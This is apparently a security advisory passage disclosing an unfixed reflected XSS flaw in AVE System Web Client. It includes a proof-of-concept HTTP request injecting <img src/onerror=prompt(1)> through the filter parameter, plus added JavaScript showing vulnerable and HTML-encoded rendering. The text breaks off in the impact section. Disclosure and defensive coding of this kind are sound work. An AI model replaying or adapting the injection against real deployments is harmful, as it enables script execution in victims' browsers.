Version: AVE System Web Client 2.1.131.13992
Fixed Version: None
CVE ID: None
Vulnerability Type: Cross Site Scripting (XSS)
AVE Web Client is a lightweight version of AVE Client. It doesn’t have to be installed and can be run in any Web browser (Chrome, IE, Firefox, etc.). It is a thin client designed for basic work with AVE (checking the progress of data reading, generating reports, reading and displaying data).
This module is also intended for outside traders, who need to have a quick overview of customers’ energy consumption, and for end users, who can display only selected data, not complete sets of meter reading data.
Because user input is not adequately validated or encoded in any of the application's input fields, a Cross-Site Scripting (XSS) vulnerability exists.
The vulnerability stems from processing user input in a way that allows JavaScript execution: the value is returned to the browser without HTML encoding. HTML encoding should be applied to all input received from users so that the browser's HTML parser is never handed tags capable of executing JavaScript.
Additionally, where markup must be accepted, an allowlist of permitted attributes should be enforced so that attributes capable of executing JavaScript are rejected; otherwise, an attacker can inject and execute JavaScript code.
GET /website/api/GetSchedulerProfiles.rails?_dc=1730446398457&sessionId=e59a5def61a9f6f39d776dad156c852c&schedulerIds=573&filter={"name":"<img src/onerror=prompt(1)>"}&page=1&start=0&limit=50 HTTP/1.1
Host: www.ave-system.com
Cookie:
Sec-Ch-Ua-Platform: "macOS"
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.ave-system.com/website/jsclient/index.html
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
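To illustrate the fix described above, the following added example (not AVE System's own code) renders the "name" field of the filter parameter from the request above in two ways: the unencoded concatenation that produces the reflected XSS, and the HTML-encoded form with an attribute allowlist. It assumes a Node.js environment and that the web client inserts the filter name into page markup; the function and attribute names are hypothetical.

```javascript
// Added example, not part of the AVE System code base. Assumptions: the client
// parses the "filter" JSON and renders its "name" field into HTML; names below
// are hypothetical; FILTER_FROM_REQUEST is the value taken from the advisory.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode every character that can open a tag, end an attribute value or close
// a tag, so the browser's parser treats the value as text, never as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Attribute allowlist: only these names may be emitted when an element has to
// be built from user-controlled data. Event handlers (onerror, onload, ...)
// and URL-bearing attributes (src, href) are deliberately absent.
const ALLOWED_ATTRIBUTES = new Set(['class', 'title', 'data-name']);

function allowlistAttributes(attrs) {
  const kept = {};
  for (const [name, value] of Object.entries(attrs)) {
    const key = name.toLowerCase();
    if (ALLOWED_ATTRIBUTES.has(key)) {
      kept[key] = escapeHtml(value); // encode even allowed values
    }
  }
  return kept;
}

// Vulnerable rendering: the decoded filter value is concatenated into HTML,
// so a value containing a tag is parsed as markup by the browser.
function renderFilterNameUnsafe(filterJson) {
  const filter = JSON.parse(filterJson);
  return `<span class="filter-name">${filter.name}</span>`;
}

// Hardened rendering: the value is encoded before it reaches the markup.
function renderFilterNameSafe(filterJson) {
  const filter = JSON.parse(filterJson);
  return `<span class="filter-name">${escapeHtml(filter.name)}</span>`;
}

// Constructed input: the "filter" value from the request in this advisory.
const FILTER_FROM_REQUEST = '{"name":"<img src/onerror=prompt(1)>"}';
```

Rendering the same filter value through renderFilterNameSafe yields a span whose text reads literally as the submitted string, with no img element for the browser to create.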
The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example: